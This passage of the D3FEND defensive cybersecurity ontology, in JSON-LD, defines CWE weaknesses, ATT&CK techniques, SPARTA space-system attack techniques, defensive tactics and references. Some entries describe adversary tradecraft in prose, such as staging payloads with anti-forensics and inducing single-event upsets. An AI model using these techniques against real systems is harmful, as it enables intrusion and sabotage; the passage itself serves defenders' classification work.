        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:N42259e8bf50e423ab1f71f922bf09a41",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-705",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-705",
      "d3f:definition": "The product does not properly return control flow to the proper location after it has completed a task or detected an unusual condition.",
      "rdfs:label": "Incorrect Control Flow Scoping",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:CWE-197",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-197",
      "d3f:definition": "Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion.",
      "rdfs:label": "Numeric Truncation Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:T1552.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:attack-id": "T1552.002",
      "d3f:definition": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.",
      "rdfs:label": "Credentials in Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N58e172a8865d41f8b753134b42b1b3e1"
        }
      ]
    },
    {
      "@id": "_:N58e172a8865d41f8b753134b42b1b3e1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CWE-784",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-784",
      "d3f:definition": "The product uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user.",
      "rdfs:label": "Reliance on Cookies without Validation and Integrity Checking in a Security Decision",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-565"
        },
        {
          "@id": "d3f:CWE-807"
        }
      ]
    },
    {
      "@id": "d3f:CWE-834",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-834",
      "d3f:definition": "The product performs an iteration or loop without sufficiently limiting the number of times that the loop is executed.",
      "rdfs:label": "Excessive Iteration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:T1027.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.003",
      "d3f:definition": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.",
      "rdfs:label": "Steganography",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:EXF-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002",
      "d3f:definition": "Information is extracted not by reading files or decrypting frames but by observing physical or protocol byproducts of computation: power draw, electromagnetic emissions, timing, thermal signatures, or traffic patterns. Repeated measurements create distinctive fingerprints correlated with internal states (key use, table loads, parser branches, buffer occupancy). Matching those fingerprints to models or templates yields sensitive facts without direct access to the protected data. In space systems, vantage points span proximity assets (for EM/thermal), ground testing and ATLO (for direct probing), compromised on-board modules that can sample rails or sensors, and remote observation of link-layer timing behaviors.",
      "rdfs:label": "Side-Channel Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Side-Channel Exfiltration"
    },
    {
      "@id": "d3f:OperatingSystemConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that alters persistent operating-system configuration resources such as kernel options, registry keys, service definitions, or security policies, affecting system startup, hardware interfaces, or global security enforcement.",
      "rdfs:label": "Operating System Configuration Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationModificationEvent"
        },
        {
          "@id": "_:N8b4f1e5fc35f46ccbea3618d60a8d157"
        }
      ]
    },
    {
      "@id": "_:N8b4f1e5fc35f46ccbea3618d60a8d157",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfiguration"
      }
    },
    {
      "@id": "d3f:OperatingSystemProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An operating system process, or system process, is a process running to perform operating system functions.",
      "rdfs:label": "Operating System Process",
      "rdfs:seeAlso": {
        "@id": "http://people.scs.carleton.ca/~maheshwa/courses/300/l4/node7.html"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      },
      "skos:altLabel": "System Process"
    },
    {
      "@id": "d3f:T1577",
      "@type": "owl:Class",
      "d3f:attack-id": "T1577",
      "d3f:definition": "Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.",
      "rdfs:label": "Compromise Application Executable - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Compromise Application Executable"
    },
    {
      "@id": "d3f:M1052",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:SystemCallFiltering"
      },
      "rdfs:label": "User Account Control"
    },
    {
      "@id": "d3f:may-be-isolated-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be isolated by",
      "owl:inverseOf": {
        "@id": "d3f:may-isolate"
      },
      "rdfs:label": "may-be-isolated-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:EX-0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0007",
      "d3f:definition": "The attacker induces or opportunistically exploits a single-event upset (SEU), a transient bit flip or latch disturbance in logic or memory, so that software executes in a state advantageous to the attack. SEUs arise when charge is deposited at sensitive nodes by energetic particles or intense electromagnetic stimuli. An actor may time operations to coincide with natural radiation peaks or use artificial means from close range. Outcomes include corrupted stacks or tables, altered branch conditions, flipped configuration bits in FPGAs or controllers, and transient faults that push autonomy/FDIR into recovery modes with broader command acceptance. SEU exploitation is probabilistic; the technique couples repeated stimulation with careful observation of mode transitions, watchdogs, and error counters to land the system in a desired but nominal-looking state from which other actions can proceed.",
      "d3f:may-corrupt": [
        {
          "@id": "d3f:CacheMemory"
        },
        {
          "@id": "d3f:FlashMemory"
        },
        {
          "@id": "d3f:MemoryExtent"
        },
        {
          "@id": "d3f:ProcessorRegister"
        }
      ],
      "rdfs:label": "Trigger Single Event Upset - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0007/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAExecutionTechnique"
        },
        {
          "@id": "_:N45421b4312ec4d1b8c6744eafda6670d"
        },
        {
          "@id": "_:N39996caf6c2e489f8086442ec8df6037"
        },
        {
          "@id": "_:Ncd68ab630fac47f1a2853e8311d88649"
        },
        {
          "@id": "_:N38a25a1c21f04998951b7be26a45f256"
        }
      ],
      "skos:prefLabel": "Trigger Single Event Upset"
    },
    {
      "@id": "_:N45421b4312ec4d1b8c6744eafda6670d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CacheMemory"
      }
    },
    {
      "@id": "_:N39996caf6c2e489f8086442ec8df6037",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FlashMemory"
      }
    },
    {
      "@id": "_:Ncd68ab630fac47f1a2853e8311d88649",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "_:N38a25a1c21f04998951b7be26a45f256",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-corrupt"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "d3f:CWE-15",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-15",
      "d3f:definition": "One or more system settings or configuration elements can be externally controlled by a user.",
      "rdfs:label": "External Control of System or Configuration Setting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1041",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1041",
      "d3f:definition": "The product has multiple functions, methods, procedures, macros, etc. that contain the same code.",
      "rdfs:label": "Use of Redundant Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:ATLASDiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0008"
      },
      "rdfs:label": "Discovery Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N077225b005d74caaa50fb82d18fbbf69"
        }
      ],
      "skos:prefLabel": "Discovery Technique"
    },
    {
      "@id": "_:N077225b005d74caaa50fb82d18fbbf69",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0008"
      }
    },
    {
      "@id": "d3f:CCI-000071_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization monitors for unauthorized remote connections to the information system on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000071"
    },
    {
      "@id": "d3f:T1021.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1021.001",
      "d3f:creates": {
        "@id": "d3f:RDPSession"
      },
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.",
      "d3f:produces": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      },
      "rdfs:label": "Remote Desktop Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1021"
        },
        {
          "@id": "_:Na9aca3eec59d46d3b18121c21da1e3b2"
        },
        {
          "@id": "_:N8bd85000967347c9926c7a4f8aa51fee"
        }
      ]
    },
    {
      "@id": "_:Na9aca3eec59d46d3b18121c21da1e3b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPSession"
      }
    },
    {
      "@id": "_:N8bd85000967347c9926c7a4f8aa51fee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:EpistemicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EL",
      "d3f:definition": "Epistemic logic addresses modalities of knowledge; i.e., the certainty of sentences.",
      "d3f:kb-article": "## References\n1. Epistemic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Epistemic_logic)",
      "d3f:synonym": "Epistemic Modal Logic",
      "rdfs:label": "Epistemic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:CWE-287",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-287",
      "d3f:definition": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.",
      "d3f:synonym": [
        "AuthC",
        "AuthN",
        "authentification"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:AuthenticationFunction"
      },
      "rdfs:label": "Improper Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-284"
        },
        {
          "@id": "_:Ne09da4cbe2eb43118300538c74a5cdd8"
        }
      ]
    },
    {
      "@id": "_:Ne09da4cbe2eb43118300538c74a5cdd8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationFunction"
      }
    },
    {
      "@id": "d3f:T1564.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.004",
      "d3f:definition": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "NTFS File Attributes",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N8dc19243d0b34506a893b548e822eb5c"
        }
      ]
    },
    {
      "@id": "_:N8dc19243d0b34506a893b548e822eb5c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an existing registry key is updated or reconfigured, reflecting changes to its metadata or properties.",
      "rdfs:label": "Windows Registry Key Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:Nee059f993c83476faa449e14499db88c"
        }
      ]
    },
    {
      "@id": "_:Nee059f993c83476faa449e14499db88c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:TimeSeriesAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TSA",
      "d3f:definition": "Time series analysis comprises methods for analyzing time series data in order to extract meaningful statistics and other characteristics of the data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Time series. [Link](https://en.wikipedia.org/wiki/Time_series)",
      "rdfs:label": "Time Series Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:Dependency",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A dependency is the relationship of relying on or being controlled by someone or something else.  This class reifies dependencies that correspond to the object property depends-on.",
      "d3f:dependent": {
        "@id": "d3f:D3FENDCore"
      },
      "d3f:provider": {
        "@id": "d3f:D3FENDCore"
      },
      "rdfs:label": "Dependency",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/14024833-n"
        },
        {
          "@id": "https://www.cisa.gov/what-are-dependencies"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N4527e8acfe3c4bbab90df9ce2f61fa2c"
        },
        {
          "@id": "_:Nf1780192d3294a06bf11f4481cfadf39"
        }
      ]
    },
    {
      "@id": "_:N4527e8acfe3c4bbab90df9ce2f61fa2c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:dependent"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "_:Nf1780192d3294a06bf11f4481cfadf39",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:provider"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-459",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-459",
      "d3f:definition": "The product does not properly \"clean up\" and remove temporary or supporting resources after they have been used.",
      "d3f:synonym": "Insufficient Cleanup",
      "rdfs:label": "Incomplete Cleanup",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:T1596.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1596.001",
      "d3f:definition": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.",
      "rdfs:label": "DNS/Passive DNS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1596"
      }
    },
    {
      "@id": "d3f:EventLogArchiveEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the archiving of event log data, typically to preserve historical records in a compressed or secure format.",
      "rdfs:label": "Event Log Archive Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:RD-0004.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0004.02",
      "d3f:definition": "Having chosen a path, adversaries pre-position the specific packages and procedures they intend to use: binary exploits, malicious tables and ephemerides, patch images, modem profiles, and operator macros that chain actions. On compromised or leased infrastructure, they stage these items where execution will be fastest, provider portals, scheduler queues, ground station file drops, or automation repos, with triggers tied to pass start, beacon acquisition, or operator shift changes. Artifacts are formatted to mission protocols (framing, CRC/MAC, timetags), chunked to meet rate/size constraints, and signed or wrapped to evade superficial checks. Anti-forensics (timestamp tampering, log suppression, ephemeral storage) reduce audit visibility, while fallback payloads are kept for alternate modes (safe-mode dictionaries, recovery consoles).",
      "rdfs:label": "Upload Exploit/Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0004/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0004"
      },
      "skos:prefLabel": "Upload Exploit/Payload"
    },
    {
      "@id": "d3f:CWE-1320",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1320",
      "d3f:definition": "Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts.",
      "rdfs:label": "Improper Protection for Outbound Error Messages and Alert Signals",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1044",
      "@type": "owl:Class",
      "d3f:attack-id": "T1044",
      "d3f:definition": "Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.010",
      "rdfs:label": "File System Permissions Weakness",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-109",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-109",
      "d3f:definition": "Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Validator Turned Off",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:CWE-589",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-589",
      "d3f:definition": "The product uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences.",
      "rdfs:label": "Call to Non-ubiquitous API",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-474"
      }
    },
    {
      "@id": "d3f:Isolate",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The isolate tactic creates logical or physical barriers in a system which reduces opportunities for adversaries to create further accesses.",
      "d3f:display-order": 2,
      "d3f:display-priority": 0,
      "rdfs:label": "Isolate",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-912",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-912",
      "d3f:definition": "The product contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the product's users or administrators.",
      "rdfs:label": "Hidden Functionality",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-684"
      }
    },
    {
      "@id": "d3f:Reference-DiagnosisOfFaultsInducedByRadiationAndCircuitLevelDesignMitigationTechniques",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.mdpi.com/2079-9292/10/17/2144"
      },
      "d3f:kb-abstract": "In this paper, we discuss the diagnosis of particle-induced failures in harsh environments such as space and high-energy physics. To address these effects, simulation-before-test and simulation-after-test can be the key points in choosing which radiation hardening by design (RHBD) techniques can be implemented to mitigate or prevent failures. Despite the fact that total ionising dose (TID) has slow but destructive effects overtime on silicon devices, single-event effect (SEE) impulsively disrupts the typical operation of a circuit with temporary or permanent effects. The recently released SpaceFibre protocol drives the current requirements for space applications, and the future upgrade of the LHC experiment scheduled by CERN will require a redesign of the electronic front-end to sustain a radiation level up to the 1 Grad TID level. The effects that these two environments have on two different architectures for high-radiation and high-frequency data transmission are reported, and the efficiency of the mitigation techniques implemented, based on simulations and measurement tests, in the commercial 65 nm technology, are exploited.",
      "d3f:kb-author": "Danilo Monda, Gabriele Ciarpi, Sergio Saponara",
      "d3f:kb-reference-of": {
        "@id": "d3f:RadiationHardening"
      },
      "d3f:kb-reference-title": "Diagnosis of Faults Induced by Radiation and Circuit-Level Design Mitigation Techniques: Experience from VCO and High-Speed Driver CMOS ICs Case Studies",
      "rdfs:label": "Reference - Diagnosis of Faults Induced by Radiation and Circuit-Level Design Mitigation Techniques: Experience from VCO and High-Speed Driver CMOS ICs Case Studies"
    },
    {
      "@id": "d3f:T1546.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.005",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.",
      "d3f:executes": {
        "@id": "d3f:ShellCommand"
      },
      "d3f:may-create": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:may-modify": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:modifies": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Trap",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N31e97004caf546a1a2a8ddd58ea15a4f"
        },
        {
          "@id": "_:N4f28f89f43ac494c91a7f4e56d903543"
        },
        {
          "@id": "_:Na67e9225be574067a180ba6ce03cdc55"
        },
        {
          "@id": "_:N71f79a2334464afea4fff3d763662bc7"
        }
      ]
    },
    {
      "@id": "_:N31e97004caf546a1a2a8ddd58ea15a4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShellCommand"
      }
    },
    {
      "@id": "_:N4f28f89f43ac494c91a7f4e56d903543",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:Na67e9225be574067a180ba6ce03cdc55",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:N71f79a2334464afea4fff3d763662bc7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:SoundexMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SM",
      "d3f:definition": "Soundex is a phonetic algorithm for indexing names by sound, as pronounced in English.",
      "d3f:kb-article": "## How it works\nThe goal is for homophones to be encoded to the same representation so that they can be matched despite minor differences in spelling. The algorithm mainly encodes consonants; a vowel will not be encoded unless it is the first letter. Soundex is the most widely known of all phonetic algorithms (in part because it is a standard feature of popular database software. Improvements to Soundex are the basis for many modern phonetic algorithms.\n\n## References\n1. Soundex. (2023, April 19). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Soundex)",
      "rdfs:label": "Soundex Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:T1631",
      "@type": "owl:Class",
      "d3f:attack-id": "T1631",
      "d3f:definition": "Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.",
      "rdfs:label": "Process Injection - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Process Injection"
    },
    {
      "@id": "d3f:SSHSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Secure Shell Protocol (SSH) session is a session over a secure channel established using SSH to connect a client to a server and establish the remote session.",
      "rdfs:label": "SSH Session",
      "rdfs:seeAlso": {
        "@id": "dbr:Secure_Shell_Protocol"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteSession"
      }
    },
    {
      "@id": "d3f:CWE-299",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-299",
      "d3f:definition": "The product does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised.",
      "rdfs:label": "Improper Check for Certificate Revocation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-295"
        },
        {
          "@id": "d3f:CWE-404"
        }
      ]
    },
    {
      "@id": "d3f:Reference-File-modifyingMalwareDetection_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180121650A1/en?oq=US-2018121650-A1"
      },
      "d3f:kb-abstract": "A security agent implemented on a computing device is described herein. The security agent is configured to detect file-modifying malware by detecting that a process is traversing a directory of the memory of the computing device and detecting that the process is accessing files in the memory according to specified file access patterns. The security agent can also be configured to correlate actions of multiple processes that correspond to a specified file access pattern and detect that one or more of the multiple processes are malware by correlating their behavior.",
      "d3f:kb-author": "Daniel W. Brown",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting file modifying malware such as wipers and ransomware that overwrite portions of files and encrypt portions of a computer's memory, respectively. Processes that are traversing a directory are identified along with file access patterns. Processes executing on a computing device that are traversing a directory include:\n\n* changing a directory of a process (e.g., iteratively, systematically, repeatedly)\n* detecting that a process is conducting an \"open directory\" operation repeatedly\n* the same process traversing through a directory and recording the locations of data files encountered in each sub - directory\n\nIn addition to identifying processes traversing a directory, particular file access patterns are also detected that may be indicative of malicious behavior including:\n* multiple file types being accessed\n* accessing a large number of files\n* files located in multiple locations in the directory being accessed\n\nIf a process is conducting a traversal of the directory and accessing files according to a defined access pattern associated with malicious behavior, a preventative action is performed.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileAccessPatternAnalysis"
      },
      "d3f:kb-reference-title": "File-modifying malware detection",
      "rdfs:label": "Reference - File-modifying malware detection - Crowdstrike Inc"
    },
    {
      "@id": "d3f:T1553.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1553.002",
      "d3f:definition": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.",
      "d3f:enables": {
        "@id": "d3f:TA0005"
      },
      "rdfs:label": "Code Signing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1553"
        },
        {
